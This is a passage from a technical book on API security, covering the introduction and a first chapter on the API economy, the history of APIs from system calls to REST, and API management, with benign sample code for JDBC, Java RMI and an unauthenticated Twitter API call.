book. Then, I must thank Jill Balzano, Coordinating Editor at Apress, who was very patient and tolerant of me throughout the publishing process. Alp Tunc served as the technical reviewer—thanks, Alp, for your quality review comments, which were quite useful. Also I would like to thank all the external reviewers of the book, who helped to make the book better. Dr. Sanjiva Weerawarana, the Founder and former CEO of WSO2, and Paul Fremantle, the CTO of WSO2, are two constant mentors for me. I am truly grateful to both Dr. Sanjiva and Paul for everything they have done for me. My wife, Pavithra, and my little daughter, Dinadi, supported me throughout this process. Thank you very much, Pavithra and Dinadi. My parents and my sister are with me all the time. I am grateful to them for everything they have done for me. Last but not least, my wife’s parents—they were amazingly helpful. Although writing a book may sound like a one-man effort, it’s the entire team behind it who makes it a reality. Thank you to everyone who supported me in many different ways. xix Introduction Enterprise APIs have become the common way of exposing business functions to the outside world. Exposing functionality is convenient, but of course comes with a risk of exploitation. This book is about securing your most important business assets or APIs. As is the case with any software system design, people tend to ignore the security element during the API design phase. Only at the deployment or at the time of integration they start worrying about security. Security should never be an afterthought—it’s an integral part of any software system design, and it should be well thought out from the design’s inception. One objective of this book is to educate the reader about the need for security and the available options for securing APIs. The book guides you through the process and shares best practices for designing APIs for better security. API security has evolved a lot in the last few years. The growth of standards for securing APIs has been exponential. OAuth 2.0 is the most widely adopted standard. It’s more than just a standard—rather a framework that lets people build solutions on top of it. The book explains in depth how to secure APIs from traditional HTTP Basic authentication to OAuth 2.0 and the profiles built around OAuth, such as OpenID Connect, User-Managed Access (UMA), and many more. JSON plays a major role in API communication. Most of the APIs developed today support only JSON, not XML. The book focuses on JSON security. JSON Web Encryption (JWE) and JSON Web Signature (JWS) are two increasingly popular standards for securing JSON messages. The latter part of the book covers JWE and JWS in detail. Another major objective of the book is to not just present concepts and theories but also to explain concepts and theories with concrete examples. The book presents a comprehensive set of examples to illustrate how to apply theory in practice. You will learn about using OAuth 2.0 and related profiles to access APIs securely with web applications, single-page applications, native mobile applications and browser-less applications. I hope this book effectively covers a much-needed subject matter for API developers, and I hope you enjoy reading it. 1 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_1 CHAPTER 1 APIs Rule! Enterprise API adoption has exceeded expectations. We see the proliferation of APIs in almost all the industries. It is not an exaggeration to say a business without an API is like a computer with no Internet. APIs are also the foundation for building communication channels in the Internet of Things (IoT) domain. From motor vehicles to kitchen appliances, countless devices have started communicating with each other via APIs. The world is more connected than ever. You share photos from Instagram in Facebook, share a location from Foursquare or Yelp in Twitter, publish tweets to the Facebook wall, connect to Google Maps via the Uber mobile app, and many more. The list of connections is limitless. All this is made possible only because of public APIs, which have proliferated in the last few years. Expedia, Salesforce, eBay, and many other companies generate a large percentage of their annual revenue via APIs. APIs have become the coolest way of exposing business functionalities to the outside world. API Economy According to an infographic1 published by the ACI Information Group, at the current rate of growth, the global Internet economy is around 10 trillion US dollars. In 1984, at the time the Internet was debuted, it linked 1000 hosts at universities and corporates. In 1998, after almost 15 years, the number of Internet users, globally, reached 50 million. It took 11 years since then to reach the magic number 1 billion Internet users, in 2009. It took just three years since then to get doubled, and in 2012 it reached to 2.1 billion. In 2019, more than half of the world’s population—about 4.3 billion people—use the Internet. This number could further increase as a result of the initiatives taken by the Internet giants like Facebook and Google. The Internet.org initiative by Facebook, 1 The History of the Internet, http://aci.info/2014/07/12/the-data-explosion-in- 2014-minute-by-minute-infographic/ 2 launched in 2013, targets to bring together technology leaders, nonprofits, and local communities to connect with the rest of the world that does not have Internet access. Google Loon is a project initiated by Google to connect people in rural and remote areas. It is based on a network of balloons traveling on the edge of space and aims to improve the connectivity of 250 million people in Southeast Asia.2 Not just humans, according to a report3 on the Internet of Things by Cisco, during 2008, the number of things connected to the Internet exceeded the number of people on earth. Over 12.5 billion devices were connected to the Internet in 2012 and 25 billion devices by the end of 2015. It is estimated that by the end of 2020, 50 billion devices will be connected. Connected devices are nothing new. They’ve been there since the introduction of the first computer networks and consumer electronics. However, if not for the explosion of the Internet adoption, the idea of a globally connected planet would never take off. In the early 1990s, computer scientists theorized how a marriage between humans and machines could give birth to a completely new form of communication and interaction via machines. That reality is now unfolding before our eyes. There are two key enablers behind the success of the Internet of Things. One is the APIs and the other is Big Data. According to a report4 by Wipro Council for Industry Research, a six-hour flight on a Boeing 737 from New York to Los Angeles generates 120 terabytes of data that is collected and stored on the plane. With the explosion of sensors and devices taking over the world, there needs to be a proper way of storing, managing, and analyzing data. By 2014, an estimated 4 zettabytes of information was held globally, and it’s estimated, by 2020, that number will climb up to 35 zettabytes.5 Most interestingly, 90% of the data we have in hand today is generated just during the last couple of years. The role of APIs under the context of the Internet of Things is equally important as Big Data. APIs are the glue which connect devices to other devices and to the cloud. 2 Google Loon, http://fortune.com/2015/10/29/google-indonesia-internet-helium- balloons/ 3 The Internet of Things: How the Next Evolution of the Internet Is Changing Everything, www.iotsworldcongress.com/documents/4643185/3e968a44-2d12-4b73-9691-17ec508ff67b 4 Big Data: Catalyzing Performance in Manufacturing, www.wipro.com/documents/Big%20Data.pdf 5 Big data explosion: 90% of existing data globally created in the past two years alone, http://bit.ly/1WajrG2 Chapter 1 apIs rule! 3 The API economy talks about how an organization can become profitable or successful in their corresponding business domain with APIs. IBM estimated the API economy to become a $2.2 trillion market by 2018,6 and the IBM Redbook, The Power of the API Economy,7 defines API economy as the commercial exchange of business functions, capabilities, or competencies as services using web APIs. It further finds five main reasons why enterprises should embrace web APIs and become an active participant in the API economy: • Grow your customer base by attracting customers to your products and services through API ecosystems. • Drive innovation by capitalizing on the composition of different APIs, yours and third parties. • Improve the time-to-value and time-to-market for new products. • Improve integration with web APIs. • Open up more possibilities for a new era of computing and prepare for a flexible future. Amazon Amazon, Salesforce, Facebook, and Twitter are few very good examples for early entrants into the API economy, by building platforms for their respective capabilities. Today, all of them hugely benefit from the widespread ecosystems built around these platforms. Amazon was one of the very first enterprises to adopt APIs to expose its business functionalities to the rest. In 2006 it started to offer IT infrastructure services to businesses in the form of web APIs or web services. Amazon Web Services (AWS), which initially included EC2 (Elastic Compute Cloud) and S3 (Simple Storage Service), was a result of the thought process initiated in 2002 to lead Amazon’s internal infrastructure in a service-oriented manner. 6 IBM announces new solutions for the API economy, http://betanews.com/2015/11/05/ ibm-announces-new-solutions-for-the-api-economy/ 7 The Power of the API Economy, www.redbooks.ibm.com/redpapers/pdfs/redp5096.pdf Chapter 1 apIs rule! 4 The former Amazon employee, Steve Yegge, shared accidentally an Amazon internal discussion via his Google+ post, which became popular later. According to Yegge’s post,8 it all began with a letter from Jeff Bezos to the Amazon engineering team, which highlighted five key points to transform Amazon into a highly effective service-oriented infrastructure. • All teams will henceforth expose their data and functionality through service interfaces. • Teams must communicate with each other through these interfaces. • There will be no other form of interprocess communication allowed: no direct linking, no direct reads of another team's data store, no shared memory model, no backdoors whatsoever. The only communication allowed is via service interface calls over the network. • It doesn't matter what technology is used. HTTP, Corba, Pubsub, custom protocols—doesn't matter. • All service interfaces, without exception, must be designed from the ground up to be externalizable. That is to say, the team must plan and design to be able to expose the interface to developers in the outside world. No exceptions. This service-based approach leads Amazon to easily expand its business model from being a bookseller to a global retailer in selling IT services or cloud services. Amazon started exposing both EC2 and S3 capabilities as APIs, both in SOAP and REST (JSON over HTTP). 8 Steve Yegge on Amazon, https://plus.google.com/+RipRowan/posts/eVeouesvaVX Chapter 1 apIs rule! 5 Salesforce Salesforce, which was launched in February 1999, is a leader in the software-as-a-service space today. The web API built around Salesforce capabilities and exposing it to the rest was a key success factor which took the company to the state where it is today. Salesforce kept on using platforms and APIs to fuel the innovation and to build a larger ecosystem around it. Uber Google exposes most of its services via APIs. The Google Maps API, which was introduced in 2005 as a free service, lets many developers consume Google Maps to create much useful mashups by integrating with other data streams. Best example is the Uber. Uber is a transportation network company based out of San Francisco, USA, which also offers its services globally in many countries outside the United States. With the Uber mobile application on iOS or Android (see Figure 1-1), its customers, who set a pickup location and request a ride, can see on Google Maps where the corresponding taxi is. Also, from the Uber driver’s application, the driver can exactly pinpoint where the customer is. This is a great selling point for Uber, and Uber as a business hugely benefits from the Google Maps public API. At the same time, Google gets track of all the Uber rides. They know exactly the places of interests and the routes Uber customers take, which can be pumped into Google’s ad engine. Not just Uber, according to a report9 by Google, by 2013 more than 1 million active sites and applications were using Google Maps API. 9 A fresh new look for the Maps API, for all one million sites, http://bit.ly/1NPH12z Chapter 1 apIs rule! 6 Facebook Facebook in 2007 launched the Facebook platform. The Facebook platform made most of the Facebook’s core capabilities available publicly to the application developers. According to the builtwith.com,10 the Facebook Graph API was used by 1 million web sites across the Internet, by October 2019. Figure 1-2 shows the Facebook Graph API usage over time. Most of the popular applications like Foursquare, Yelp, Instagram, and many more consume Facebook API to publish data to the user’s Facebook wall. Both parties mutually benefit from this, by expanding the adaptation and building a strong ecosystem. Figure 1-1. Uber mobile app uses Google Maps 10 Facebook Graph API Usage Statistics, http://trends.builtwith.com/javascript/ Facebook-Graph-API Chapter 1 apIs rule! 7 Netflix Netflix, a popular media streaming service in the United States with more than 150 million subscribers, announced its very first public API in 2008.11 During the launch, Daniel Jacobson, the Vice President of Edge Engineering at Netflix, explained the role of this public API as a broker, which mediates data between internal services and public developers. Netflix has come a long way since its first public API launch, and today it has more than a thousand types of devices supporting its streaming API.12 By mid-2014, there were 5 billion API requests generated internally (via devices used to stream the content) and 2 million public API requests daily. Figure 1-2. Facebook Graph API usage statistics, the number of web sites over time 11 Netflix added record number of subscribers, www.cnn.com/2019/04/16/media/netflix- earnings-2019-first-quarter/index.html 12 API Economy: From systems to business services, http://bit.ly/1GxmZe6 Chapter 1 apIs rule! 8 Walgreens Walgreens, the largest drug retailing chain in the United States, opened up its photo printing and pharmacies to the public in 2012/2013, via an API.13 They started with two APIs, a QuickPrints API and a Prescription API. This attracted many developers, and dozens of applications were developed to consume Walgreens’ API. Printicular is one such application developed by MEA Labs, which can be used to print photos from Facebook, Twitter, Instagram, Google+, Picasa, and Flickr (see Figure 1-3). Once you pick your photos from any of these connected sites to be printed, you have the option to pick the printed photos from the closest Walgreens store or also can request to deliver. With the large number of applications built against its API, Walgreens was able to meet its expectations by enhancing customer engagements. Figure 1-3. Printicular application written against the Walgreens API 13 Walgreens API, https://developer.walgreens.com/apis Chapter 1 apIs rule! 9 Governments Not just the private enterprises but also governments started exposing its capabilities via APIs. On May 22, 2013, Data.gov (an initiative managed by the US General Services Administration, with the aim to improve public access to high-value, machine-readable datasets generated by the executive branch of the federal government) launched two initiatives to mark both the anniversary of the Digital Government Strategy and the fourth anniversary of Data.gov. First is a comprehensive listing of APIs that were released from across the federal government as part of the Digital Government Strategy. These APIs accelerated the development of new applications on everything from health, public safety, education, consumer protection, and many more topics of interest to Americans. This initiative also helped developers, where they can find all the government’s APIs in one place (http://api.data.gov), with links to API documentation and other resources. IBM Watson APIs have become the key ingredients in building a successful enterprise. APIs open up the road to new business ecosystems. Opportunities that never existed before can be realized with a public API. In November 2013, for the first time, IBM Watson technology was made available as a development platform in the cloud, to enable a worldwide community of software developers to build a new generation of applications infused with Watson's cognitive computing intelligence.14 With the API, IBM also expected to create multiple ecosystems that will open up new market places. It connected Elsevier (world-leading provider of scientific, technical, and medical information products and services) and its expansive archive of studies on oncology care to both the medical expertise of Sloan Kettering (a cancer treatment and research institution founded in 1884) and Watson’s cognitive computing prowess. Through these links, IBM now provides physicians and nurse practitioners with information on symptoms, diagnosis, and treatment approaches. 14 IBM Watson’s Next Venture, www-03.ibm.com/press/us/en/pressrelease/42451.wss Chapter 1 apIs rule! 10 Open Banking API adaptation has gone viral across verticals: retail, healthcare, financial, government, education, and in many more verticals. In the financial sector, the Open Bank15 project provides an open source API and app store for banks that empower financial institutions to securely and rapidly enhance their digital offerings using an ecosystem of third-party applications and services. As per Gartner,16 by 2016, 75% of the top 50 global banks have launched an API platform, and 25% have launched a customer-facing app store. The aim of Open Bank project is to provide a uniform interface, abstracting out all the differences in each banking API. That will help application developers to build applications on top of the Open Bank API, but still would work against any of the banks that are part of the Open Bank initiative. At the moment, only four German banks are onboarded, and it is expected to grow in the future.17 The business model behind the project is to charge an annual licensing fee from the banks which participate. Healthcare The healthcare industry is also benefiting from the APIs. By November 2015, there were more than 200 medical APIs registered in ProgrammableWeb.18 One of the interesting projects among them, the Human API19 project, provides a platform that allows users to securely share their health data with developers of health applications and systems. This data network includes activity data recorded by pedometers, blood pressure measurements captured by digital cuffs, medical records from hospitals, and more. According to a report20 by GlobalData, the mobile health market was worth $1.2 billion in 2011, but expected to jump in value to reach $11.8 billion by 2018, climbing at an impressive compound annual growth rate (CAGR) of 39%. The research2guidance21 15 Open Bank Project, www.openbankproject.com/ 16 Gartner: Hype Cycle for Open Banking, www.gartner.com/doc/2556416/ hype-cycle-open-banking 17 Open Bank Project connector status, https://api.openbankproject.com/connectors-status/ 18 Medical APIs, www.programmableweb.com/category/medical/apis?&category=19994 19 Human API, http://hub.humanapi.co/docs/overview 20 Healthcare Goes Mobile, http://healthcare.globaldata.com/media-center/ press-releases/medical-devices/mhealth-healthcare-goes-mobile 21 Research2guidance, http://research2guidance.com/the-market-for-mobile-health- sensors-will-grow-to-5-6-billion-by-2017/ Chapter 1 apIs rule! 11 estimated the market for mobile health sensors to grow to $5.6 billion by 2017. Aggregating all these estimated figures, it’s more than obvious that the demand for medical APIs is only to grow in the near future. Wearables Wearable industry is another sector, which exists today due to the large proliferation of APIs. The ABI Research22 estimates that the world will have 780 million wearables by 2019—everything from fitness trackers and smart watches to smart glasses and even heart monitors, in circulation. Most of the wearables come with low processing power and storages and talk to the APIs hosted in the cloud for processing and storage. For example, Microsoft Band, a wrist-worn wearable, which keeps track of your heart rate, steps taken, calories burned, and sleep quality, comes with the Microsoft Health mobile application. The wearable itself keeps tracks of the steps, distances, calories burned, and heart rate in its limited storage for a short period. Once it’s connected to the mobile application, via Bluetooth, all the data are uploaded to the cloud through the application. The Microsoft Health Cloud API23 allows you to enhance the experiences of your apps and services with real-time user data. These RESTful APIs provide comprehensive user fitness and health data in an easy-to-consume JSON format. This will enhance the ecosystem around Microsoft Band, as more and more developers can now develop useful applications around Microsoft Health API, hence will increase Microsoft Band adaptation. This will also let third-party application developers to develop a more useful application by mashing up their own data streams with the data that come from Microsoft Health API. RunKeeper, MyFitnessPal, MyRoundPro, and many more fitness applications have partnered with Microsoft Band in that effort, for mutual benefits. 22 The Wearable Future Is Hackable, https://blogs.mcafee.com/consumer/ hacking-wearable-devices/ 23 Microsoft Cloud Health API, https://developer.microsoftband.com/cloudAPI Chapter 1 apIs rule! 12 Business Models Having a proper business model is the key to the success in API economy. The IBM Redbook, The Power of the API Economy,24 identifies four API business models, as explained here: • Free model: This model focuses on the business adoption and the brand loyalty. Facebook, Twitter, and Google Maps APIs are few examples that fall under this model. • Developer pays model: With this model, the API consumer or the developer has to pay for the usage. For example, PayPal charges a transaction fee, and Amazon lets developers pay only for what they use. This model is similar to the “Direct Revenue” model described by Wendy Bohner from Intel.25 • Developer is paid directly: This is sort of a revenue sharing model. The best example is the Google AdSense. It pays 20% to developers from revenue generated from the posted ads. Shopping.com is another example for revenue sharing business model. With Shopping. com API developers can integrate relevant product content with the deepest product catalogue available online and add millions of unique products and merchant offers to your site. It pays by the clicks. • Indirect: With this model, enterprises build a larger ecosystem around it, like Salesforce, Twitter, Facebook, and many more. For example, Twitter lets developers build applications on top of its APIs. This benefits Twitter, by displaying sponsored tweets on end user’s Twitter timeline, on those applications. The same applies to Salesforce. Salesforce encourages third-party developers to extend its platform by developing applications on top of its APIs. 24 The Power of the API Economy, www.redbooks.ibm.com/redpapers/pdfs/redp5096.pdf 25 Wendy Bohner’s blog on API Economy: https://blogs.intel.com/api-management/ 2013/09/20/the-api-economy/ Chapter 1 apIs rule! 13 The API Evolution The concept behind APIs has its roots from the beginning of computing. An API of a component defines how others would interact with it. API stands for application programming interface, and it’s a technical specification for developers and architects. If you are familiar with the Unix or Linux operating system, the man command shouldn’t be something new. It generates the technical specification for each command in the system, which defines how a user can interact with it. The output from the man command can be considered as the API definition of the corresponding command. It defines everything you need to know to execute it, including the synopsis, description with all the valid input parameters, examples, and many more. The following command on a Unix/Linux or even on a Mac OS X environment will generate the technical definition of the ls command. $ man ls NAME ls -- list directory contents SYNOPSIS ls [-ABCFGHLOPRSTUW@abcdefghiklmnopqrstuwx1] [file ...] Going little further from there, if you are a computer science graduate or have read about operating systems, you surely have heard of system calls. System calls provide an interface to the operating system’s kernel, or a system call is how a program requests a service from the underlying operating system. Kernel is the core of the operating system, which wraps the hardware layer from the top-level applications (see Figure 1-4). If you want to print something from the browser, then the print command, which initiated from the browser, first has to pass through the kernel to reach the actual printer connected to the local machine itself, or remotely via the network. Where kernel executes its operations and provides services is known as the kernel space, while the top-level applications execute their operations and provide services in the user space. The kernel space is accessible for applications running in the user space only through system calls. In other words, system calls are the kernel API for the user space. Chapter 1 apIs rule! 14 The Linux kernel has two types of APIs: one for the applications running in the user space and the other one is for its internal use. The API between the kernel space and user space can also be called the public API of the kernel, while the other as its private API. Even at the top-level application, if you’ve worked with Java, .NET, or any other programming language, you’ve probably written code against an API. Java provides Java Database Connectivity (JDBC) as an API to talk to different heterogeneous database management systems (DBMSs), as shown in Figure 1-5. The JDBC API encapsulates the logic for how your application connects to a database; thus, the application logic doesn’t need to change whenever it connects to different databases. The database’s connectivity logic is wrapped in a JDBC driver and exposed as an API. To change the database, you need to pick the right JDBC driver. Figure 1-4. Operating system’s kernel Figure 1-5. JDBC API An API itself is an interface. It’s the interface for clients that interact with the system or the particular component. Clients should only know about the interface and nothing about its implementation. A given interface can have more than one implementation, and a client written against the interface can switch between implementations Chapter 1 apIs rule! 15 seamlessly and painlessly. The client application and the API implementation can run in the same process or in different processes. If they’re running in the same process, then the call between the client and the API is a local one—if not, it’s a remote call. In the case of the JDBC API, it’s a local call. The Java client application directly invokes the JDBC API, implemented by a JDBC driver running in the same process. The following Java code snippet shows the usage of the JDBC API. This code has no dependency to the underneath database—it only talks to the JDBC API. In an ideal scenario, the program reads the name of the Oracle driver and the connection to the Oracle database from a configuration file, making the code completely clean from any database implementations. import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.SQLException; public class JDBCSample { public void updataEmpoyee() throws ClassNotFoundException, SQLException { Connection con = null; PreparedStatement prSt = null; try { Class.forName("oracle.jdbc.driver.OracleDriver"); con = DriverManager.getConnection("jdbc:oracle:thin:@<hostname>:<port num>:<DB name>", "user", "password"); String query = "insert into emp(name,salary) values(?,?)"; prSt = con.prepareStatement(query); prSt.setString(1, "John Doe"); prSt.setInt(2, 1000); prSt.executeUpdate(); } finally { try { if (prSt != null) prSt.close(); if (con != null) con.close(); } catch (Exception ex) { Chapter 1 apIs rule! 16 // log } } } } We can also access APIs remotely. To invoke an API remotely, you need to have a protocol defined for interprocess communication. Java RMI, CORBA, .NET Remoting, SOAP, and REST (over HTTP) are some protocols that facilitate interprocess communication. Java RMI provides the infrastructure-level support to invoke a Java API remotely from a nonlocal Java virtual machine (JVM, which runs in a different process than the one that runs the Java API). The RMI infrastructure at the client side serializes all the requests from the client into the wire (also known as marshalling) and deserializes into Java objects at the server side by its RMI infrastructure (also known as unmarshalling); see Figure 1-6. This marshalling/unmarshalling technique is specific to Java. It must be a Java client to invoke an API exposed over Java RMI—and it’s language dependent. Figure 1-6. Java RMI The following code snippet shows how a Java client talks to a remotely running Java service over RMI. The Hello stub in the following code represents the service. The rmic tool, which comes with Java SDK, generates the stub against the Java service interface. We write the RMI client against the API of the RMI service. import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class RMIClient { Chapter 1 apIs rule! 17 public static void main(String[] args) { String host = (args.length < 1) ? null : args[0]; try { Registry registry = LocateRegistry.getRegistry(host); Hello stub = (Hello) registry.lookup("Hello"); String response = stub.sayHello(); System.out.println("response: " + response); } catch (Exception e) { e.printStackTrace(); } } } SOAP-based web services provide a way to build and invoke a hosted API in a language- and platform-neutral manner. It passes a message from one end to the other as an XML payload. SOAP has a structure, and there are a large number of specifications to define its structure. The SOAP specification defines the request/response protocol between the client and the server. Web Services Description Language (WSDL) specification defines the way you describe a SOAP service. The WS-Security, WS-Trust, and WS-Federation specifications describe how to secure a SOAP-based service. WS- Policy provides a framework to build quality-of-service expressions around SOAP services. WS-SecurityPolicy defines the security requirements of a SOAP service in a standard way, built on top of the WS-Policy framework. The list goes on and on. SOAP- based services provide a highly decoupled, standardized architecture with policy- based governance. They do have all necessary ingredients to build a service-oriented architecture (SOA). At least, that was the story a decade ago. The popularity of SOAP-based APIs has declined, mostly due to the inherent complexity of the WS-∗ standards. SOAP promised interoperability, but many ambiguities arose among different implementation stacks. To overcome this issue and promote interoperability between implementation stacks, the Web Services Interoperability (WS-I)26 organization came up with the Basic Profile for web services. The Basic Profile helps in removing ambiguities in web service standards. An API design built on top of SOAP should follow the guidelines Basic Profile defines. 26 The OASIS Web Services Interoperability Organization, www.ws-i.org/ Chapter 1 apIs rule! 18 Note sOap was initially an acronym that stood for simple Object access protocol. From sOap 1.2 onward, it is no longer an acronym. In contrast to SOAP, REST is a design paradigm, rather than a rule set. Even though Roy Fielding, who first described REST in his PhD thesis,27 did not couple REST to HTTP, 99% of RESTful services or APIs today are based on HTTP. For the same reason, we could easily argue, REST is based on the rule set defined in the HTTP specification. The Web 2.0 trend emerged in 2006–2007 and set a course to a simpler, less complex architectural style for building APIs. Web 2.0 is a set of economic, social, and technology trends that collectively formed the basis for the next generation of Internet computing. It was built by tens of millions of participants. The platform built around Web 2.0 was based on the simple, lightweight, yet powerful AJAX-based programming languages and REST—and it started to move away from SOAP-based services. Modern APIs have their roots in both SOAP and REST. Salesforce launched its public API in 2000, and it still has support for both SOAP and REST. Amazon launched its web services API in 2002 with support for both REST and SOAP, but the early adoption rate of SOAP was very low. By 2003, it was revealed that 85% of Amazon API usage was on REST.28 ProgrammableWeb, a registry of web APIs, has tracked APIs since 2005. In 2005, ProgrammableWeb tracked 105 APIs, including Google, Salesforce, eBay, and Amazon. The number increased by 2008 to 1000 APIs, with growing interest from social and traditional media companies to expose data to external parties. There were 2500 APIs by the end of 2010. The online clothing and shoe shop Zappos published a REST API, and many government agencies and traditional brick-and-mortar retailers joined the party. The British multinational grocery and merchandise retailer Tesco allowed ordering via APIs. The photo-sharing application Instagram became the Twitter for pictures. The Face introduced facial recognition as a service. Twilio allowed anyone to create telephony applications in no time. The number of public APIs rose to 5000 by 2011; and in 2014 ProgrammableWeb listed out more than 14,000 APIs. In June 2019, ProgrammableWeb 27 Architectural Styles and the Design of Network-based Software Architectures, www.ics.uci.edu/~fielding/pubs/dissertation/top.htm 28 REST vs. SOAP In Amazon Web Services, https://developers.slashdot.org/ story/03/04/03/1942235/rest-vs-soap-in-amazon-web-services Chapter 1 apIs rule! 19 announced that the number of APIs it tracks eclipsed 22,000 (see Figure 1-7). At the same time, the trend toward SOAP has nearly died: 73% of the APIs on ProgrammableWeb by 2011 used REST, while SOAP was far behind with only 27%.29 Figure 1-7. The growth of APIs listed on ProgrammableWeb since 2005 The term API has existed for decades, but only recently has it been caught up in the hype and become a popular buzzword. The modern definition of an API mostly focused on a hosted, web-centric (over HTTP), public-facing service to expose useful business functionalities to the rest of the world. According to the Forbes magazine, an API is the primary customer interface for technology-driven products and services and a key channel for driving revenue and brand engagements. Salesforce, Amazon, eBay, Dropbox, Facebook, Twitter, LinkedIn, Google, Flickr, Yahoo, and most of the key players doing business online have an API platform to expose business functionalities. 29 SOAP is Not Dead, http://readwrite.com/2011/05/26/soap-is-not-dead---its-undead Chapter 1 apIs rule! 20 API Management Any HTTP endpoint, with a well-defined interface to accept requests and generate responses based on certain business logic, can be treated as a naked API. In other words, a naked API is an unmanaged API. An unmanaged API has its own deficiencies, as listed here: • There is no way to track properly the business owner of the API or track how ownership evolves over time. • API versions are not managed properly. Introduction of a new API could possibly break all the existing consumers of the old API. • No restriction on the audience. Anyone can access the API anonymously. • No restriction on the number of API calls by time. Anyone can invoke the API any number of times, which could possibly cause the server hosting the API to starve all its resources. • No tracking information at all. Naked APIs won’t be monitored and no stats will be gathered. • Inability to scale properly. Since no stats are gathered based on the API usage, it would be hard to scale APIs based on the usage patterns. • No discoverability. APIs are mostly consumed by applications. To build applications, application developers need to find APIs that suit their requirements. • No proper documentation. Naked APIs will have a proper interface, but no proper documentation around that. • No elegant business model. It’s hard to build a comprehensive business model around naked APIs, due to all the eight reasons listed earlier. A managed API must address all or most of the preceding concerns. Let’s take an example, the Twitter API. It can be used to tweet, get timeline updates, list followers, update the profile, and do many other things. None of these operations can be Chapter 1 apIs rule! 21 performed anonymously—you need to authenticate first. Let’s take a concrete example (you need to have cURL installed to try this, or you can use the Chrome Advanced REST client browser plug-in). The following API is supposed to list all the tweets published by the authenticated user and his followers. If you just invoke it, it returns an error code, specifying that the request isn’t authenticated: \> curl https://api.twitter.com/1.1/statuses/home_timeline.json {"errors":[{"message":"Bad Authentication data","code":215}]} All the Twitter APIs are secured for legitimate access with OAuth 1.0 (which we discuss in detail in Appendix B). Even with proper access credentials, you can’t invoke the API as you wish. Twitter enforces a rate limit on each API call: within a given time window, you can only invoke the Twitter API a fixed number of times. This precaution is required for all public-facing APIs to minimize any possible denial of service (DoS) attacks. In addition to securing and rate limiting its APIs, Twitter also closely monitors them. Twitter API Health30 shows the current status of each API. Twitter manages versions via the version number (e.g., 1.1) introduced into the URL itself. Any new version of the Twitter API will carry a new version number, hence won’t break any of the existing API consumers. Security, rate limiting (throttling), versioning, and monitoring are key aspects of a managed business API. It also must have the ability to scale up and down for high availability based on the traffic. Lifecycle management is another key differentiator between a naked API and a managed API. A managed API has a lifecycle from its creation to its retirement. A typical API lifecycle might flow through Created, Published, Deprecated, and Retired stages, as illustrated in Figure 1-8. To complete each lifecycle stage, there can be a checklist to be verified. For example, to promote an API from Created to Published, you need to make sure the API is secured properly, the documentation is ready, throttling rules are enforced, and so on. A naked business API, which only worries about business functionalities, can be turned into a managed API by building these quality-of-service aspects around it. 30 Twitter Health, https://dev.twitter.com/status Chapter 1 apIs rule! 22 The API description and discoverability are two key aspects of a managed API. For an API, the description has to be extremely useful and meaningful. At the same time, APIs need to be published somewhere to be discovered. A comprehensive API management platform needs to have at least three main components: a publisher, a store, and a gateway (see Figure 1-9). The API store is also known as the developer portal. The API publisher provides tooling support to create and publish APIs. When an API is created, it needs to be associated with API documentation and other related quality- of- service controls. Then it’s published into the API store and deployed into the API gateway. Application developers can discover APIs from the store. ProgrammableWeb (www.programmableweb.com) is a popular API store that has more than 22,000 APIs at the time of this writing. You could also argue that ProgrammableWeb is simply a directory, rather than a store. A store goes beyond just listing APIs (which is what ProgrammableWeb does): it lets API consumers or application developers subscribe to APIs, and it manages API subscriptions. Further, an API store supports social features like tagging, commenting, and rating APIs. The API gateway is the one which takes all the traffic in runtime and acts as the policy enforcement point. The gateway checks all the requests that pass through it against authentication, authorization, and throttling policies. The statistics needed for monitoring is also gathered at the API gateway level. There are many open source and proprietary API management products out there that provide support for comprehensive API store, publisher, and gateway components. Figure 1-8. API lifecycle Chapter 1 apIs rule! 23 In the SOAP world, there are two major standards for service discovery. Universal Description, Discovery, and Integration (UDDI) was popular, but it's extremely bulky and didn’t perform to the level it was expected to. UDDI is almost dead today. The second standard is WS-Discovery, which provides a much more lightweight approach. Most modern APIs are REST-friendly. For RESTful services or APIs, there is no widely accepted standard means of discovery at the time of this writing. Most API stores make discovery via searching and tagging. Describing a SOAP-based web service is standardized through the Web Service Definition Language (WSDL) specification. WSDL describes what operations are exposed through the web service and how to reach them. For RESTful services and APIs, there are two popular standards for description: Web Application Description Language (WADL) and Swagger. WADL is an XML-based standard to describe RESTful or HTTP-based services. Just as in WSDL, WADL describes the API and its expected request/response messages. Swagger is a specification and a complete framework implementation for describing, producing, consuming, and visualizing RESTful web services. With more than 350,000 downloads per month, of Swagger and Swagger-related Figure 1-9. API management platform Chapter 1 apIs rule! 24 tooling, the Swagger specification is promising to be the most widely used format for describing APIs.31 Figure 1-10 shows the Swagger definition of the Swagger Petstore API.32 31 Open API Initiative Specification, https://openapis.org/specification 32 Swagger Petstore API, http://petstore.swagger.io/ Figure 1-10. Swagger definition of the Swagger Petstore API Based on the Swagger 2.0 specification, the OpenAPI Initiative (OAI) has developed an OAI specification involving API consumers, developers, providers, and vendors, to define a standard, a language-agnostic interface for REST APIs. Google, IBM, PayPal, Intuit, SmartBear, Capital One, Restlet, 3scale, and Apigee got involved in creating the OpenAPI Initiative under the Linux foundation. Chapter 1 apIs rule! 25 MANAGED APIS AT NETFLIX Netflix started its journey as a DVD rental service and then evolved into a video streaming platform and published its first apI in 2008. In January 2010, Netflix apI recorded 600 million requests (per month), and in January 2011, the number rose up to 20.7 billion, then again after a year, in January 2012, Netflix apI was hit with 41.7 billion requests.33 today, at the time of this writing, Netflix handles more than one third of the entire Internet traffic in North america. It’s a widespread service globally over 190 countries in 5 continents, with more than 139 million members. Netflix apI is accessed by thousands of supported devices, generating billions of apI requests per day. even though Netflix apI was initially developed as a way for external application developers to access Netflix’s catalogue, it soon became a key part in exposing internal functionality to living room devices supported by Netflix. the former is the Netflix’s public apI, while the latter is its private apI. the public apI, when compared with the private apI, only attracted a small number of traffic. at the time Netflix decided to shut down the public apI in November 2011, it only attracted 0.3% of the total apI traffic.34 Netflix uses its own apI gateway, Zuul, to manage all its apI traffic.35 Zuul is the front door for all the requests from devices and web sites to the back end of the Netflix streaming application. as an edge service application, Zuul is built to enable dynamic routing, monitoring, resiliency, and security. It also has the ability to route requests to multiple amazon auto scaling Groups as appropriate.36 The Role of APIs in Microservices Going back to the good old days, there was an unambiguous definition for API vs. service. An API is the interface between two parties or two components. These two parties/components can communicate within a single process or between different processes. A service is a concrete implementation of an API using one of the technologies/standards available. The 